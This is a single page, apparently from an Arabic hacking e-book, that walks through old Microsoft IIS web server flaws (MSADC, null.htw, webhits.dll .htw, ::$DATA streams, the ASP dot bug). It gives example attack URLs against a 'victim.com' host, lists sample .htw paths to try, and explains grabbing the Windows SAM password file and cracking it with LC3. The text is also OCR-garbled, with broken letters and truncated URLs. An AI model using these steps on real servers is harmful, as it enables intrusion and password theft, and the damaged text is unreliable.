Page 145 - بسم الله الرحمن الرحيم
P. 145
تصفعيله ..
فإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي تصسمح لك بقراءة اي ملف )) asp.اعني رؤية
المصدر(( .
باستخدا.م هذا المر ستحصل على ملف السا.م )) اذا كان النظا.م مصابا (( :
_.http://www.victim.com/msadc/samples...nt/repair/sam
بعد الحصول على ملف السا.م .. Expand it & Crack itباستخدا.م الداة المفضلة لدي ) LC3.0سيتم
كسرها في اقل من 24ساعه ( .
--------------
- : Null.htw
------------
عملية شر ح كيفية عمل هذه الثغرة معقد قليل ..لذا سأكتفي فقط بطريقة الستفادة منها ..
باختتصار تصسمح لك برؤية السورس كود لي ملف .. ASP
لتنفيذ الثغرة http://www.victim.com/null.htw?CiWe...HiliteType=full :
سيعرض لك هذا الرابط السورس كود الخاص بالصفحه . Default.asp
----------------------
- : webhits.dll & .htw
----------------------
اول قم بتجربة اللنك على النظا.م الهدف http://www.victim.com/blabla.htw :
فإذا كان الرد بهذه العبارة format of the QUERY_STRING is invalid :فهذا يعني ان النظا.م
الهدف مصاب بنسبة . %90
اختيرا جهرب تصنفيذ الثغرة بهذه الطريقة :
www.victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full
مع تصغيير الـ XXXXX/XXXXX/XXXX/XXX.htwباحد هذه الملحقات ,وبالتأكيد سيعمل احدها :
iissamples/issamples/oop/qfullhit.htw
iissamples/issamples/oop/qsumrhit.htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.htw
وبالتالي ستحصل على ملف السا.م قم بكسره بواسطه الداة .. LC3
------------------------------------------------
]-: ASP Alternate Data Streams [::$DATA
------------------------------------------------
هذه الثغرة كانت بدايتها منذ العا.م .. 1998وهي مخصصة بالتحديد لسيرفرات IIS3.0والن تصعمل على
بعض سيرفرات .. IIS4.0
ومهمتها عرض السورس كود لي صفحه )) البعض يتساءل مالفائدة من عرض سورس الصفحه ؟؟ ((
الجهابة ان بعض الصفحات تصحتوي على معلومات مهمة مثل كلمات مرور قواعد البيانات مثل Global.asa
يمكن تصنفيذ الثغرة من المتصفح بواسطة هذا المر http://www.victim.com/default.asp::
$DATA
------------------
- : ASP dot bug
------------------
ربما اقد.م ثغرة في هذا النص هي هذه الثغرة حيث تصقو.م ايضا بعرض السورس كود الخاص بأي صفحه ..
145
